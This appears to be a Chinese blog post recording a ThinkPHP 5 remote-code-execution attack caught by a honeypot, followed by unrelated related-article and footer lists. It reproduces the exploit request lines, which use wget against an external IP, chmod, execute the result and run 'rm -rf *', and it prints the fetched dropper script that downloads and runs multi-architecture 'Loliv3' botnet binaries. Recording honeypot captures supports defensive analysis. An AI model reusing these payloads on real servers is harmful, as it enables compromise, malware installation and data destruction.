蜜罐捕获攻击

212.237.14.55 - - [22/Dec/2018:13:17:50 +0800] "GET /public/index.php?s=/index/%09hink%07pp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=wget%20http://142.93.197.215/sh;%20chmod%20777%20sh;%20./sh;%20rm%20-rf%20* HTTP/1.1" 404 162 "-" "python-requests/2.6.0 CPython/2.6.6 Linux/2.6.32-696.23.1.el6.x86_64"

212.237.14.55 - - [22/Dec/2018:17:59:48 +0800] "GET /public/index.php?s=/index/%09hink%07pp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=wget%20http://142.93.197.215/php;chmod%20777%20php;./php;rm%20-rf%20* HTTP/1.1" 404 162 "-" "python-requests/2.6.0 CPython/2.6.6 Linux/2.6.32-696.23.1.el6.x86_64"

利用RCE获取远程服务器文件:

http://142.93.197.215/php

binarys="mips mpsl arm arm5 arm6 arm7 sh4 ppc x86 arc"

server_ip="142.93.197.215"

binname="Loliv3"

execname="LoliSecHoe"

for arch in $binarys

do

cd /tmp

wget http://$server_ip/$binname.$arch -O $execname

chmod 777 $execname

./$execname Think.php

rm -rf $execname

done

写入并执行

Loliv3.arc

Loliv3.arm

Loliv3.arm5

Loliv3.arm6

Loliv3.arm7

Loliv3.mips

Loliv3.mpsl

Loliv3.ppc

Loliv3.sh4

Loliv3.x86

php

连接Think.php

php rce,批量thinkphp5的RCE漏洞利用相关推荐

  1. thinkphp5.0.22漏洞利用

    一.搭建环境 phpstudy的版本大于5.0 解压源码到www下 浏览器访问 127.0.0.1/thinkphp/public/index.php 漏洞利用 ?s=.|think\config/g ...

  2. webmin RCE漏洞利用及分析

    Webmin是目前功能最强大的基于Web的Unix系统管理工具.管理员通过浏览器访问Webmin的各种管理功能并完成相应的管理动作. 利用条件:webmin <= 1.910 原因:官网 Sou ...

  3. WiFiDemon – iOS WiFi RCE 0-Day漏洞利用

    近日,ZecOps安全研究人员发现了iOS WiFi命名漏洞的零交互攻击利用方式,可以用来远程劫持iPhone设备. Wi-Fi-Demon Wifid 是处理与WiFi连接相关的协议的系统daemo ...

  4. RCE代码及命令执行漏洞简解

    在 Web 应用中有时候程序员为了考虑灵活性.简洁性,会在代码调用 代码或命令执行函数去处理.比如当应用在调用一些能将字符串转化成代 码的函数时,没有考虑用户是否能控制这个字符串,将造成代码执行漏 洞 ...

  5. 30.WEB漏洞-RCE代码及命令执行漏洞

    30:WEB漏洞-RCE代码及命令执行漏洞 参考文章:https://www.cnblogs.com/zhengna/p/15775737.html 本文为博主学习复现笔记 文章目录 30:WEB漏洞 ...

  6. Spring 框架更新了一条可能造成 RCE(远程命令执行漏洞)

    今天 Spring 框架更新了一条可能造成 RCE(远程命令执行漏洞)的问题代码,如图: 随即在国内安全圈炸开了锅,大家纷纷转发一张图: 上次因为核弹级漏洞 log4j2 的 POC 公开,大批企业为 ...

  7. Drupal 7.31SQL注入getshell漏洞利用详解及EXP

    0x00 这个漏洞威力确实很大,而且Drupal用的也比较多,使用Fuzzing跑字典应该可以扫出很多漏洞主机,但是做批量可能会对对方网站造成很大的损失,所以我也就只是写个Exp不再深入下去. 0x0 ...

  8. metasploit 快速入门(三) 服务端漏洞利用

    目录 简介 01 攻击Linux服务器 02 SQL 注入 03 shell类型 04 攻击Windows 服务器 05 利用公用服务 06 MS17-010 永恒之蓝 SMB远程代码执行Window ...

  9. [系统安全] 十.Windows漏洞利用之SMBv3服务远程代码执行漏洞(CVE-2020-0796)及防御详解

    您可能之前看到过我写的类似文章,为什么还要重复撰写呢?只是想更好地帮助初学者了解病毒逆向分析和系统安全,更加成体系且不破坏之前的系列.因此,我重新开设了这个专栏,准备系统整理和深入学习系统安全.逆向分 ...

最新文章

  1. Hadoop概念学习系列之Java调用Shell命令和脚本,致力于hadoop/spark集群(三十六)...
  2. 扒一扒 JVM 的垃圾回收机制,拿大厂offer少不了它!
  3. 使用scrapy抓取股票代码
  4. 王晖:以Linux为核心扩展云核心组件
  5. Google布隆过滤器与Redis布隆过滤器详解
  6. MacOS 的 Automator 实用案例详解
  7. 通过暴露出来的OA和github信息拿Shell
  8. window使用技巧记录
  9. 辩论计算机未来不能取代书本的问题,电脑不能取代书本辩论会材料.doc
  10. 排列生成算法--C++
  11. python优先级排序_Python Numpy重新排列双向排序
  12. linux查看电脑硬件信息,Linux下查看电脑硬件配置【转】
  13. cocos2d-x中实现不规则按钮的点击效果
  14. mysql选择联合索引还是单索引?索引列应该使用哪一个最有效?深入測试探讨...
  15. 编程基本功:不要患上词汇匮乏症
  16. 【软件过程改进 学习笔记】过程思维 ( 软件危机 | 软件过程 | 过程改进 | 过程思维 | 过程描述 | ISO 9000 | 6σ | PCM | CMMI )
  17. iOS开发者必备: 五大编程类工具
  18. 分布式事务之柔性事务
  19. OBS Studio安装教程以及录制等详细配置
  20. 使用 Wrapper 自定义SQL

热门文章

  1. GBASE 8s数据库监控
  2. 提升效率教程——Clover 资源管理器标签-Chinar
  3. 企业微信开发--网页授权(获取code)
  4. 宝付持续推动助力小微,减费让利进行时
  5. torrent文件打开成php,.torrent格式用什么打开
  6. 博多·舍费尔实现财务自由的10+1个想法
  7. 天津大学在线课程:神经工程学
  8. DHCP中继实验配置
  9. OpenCV3编程入门(一)
  10. linux mint安装向日葵远程控制软件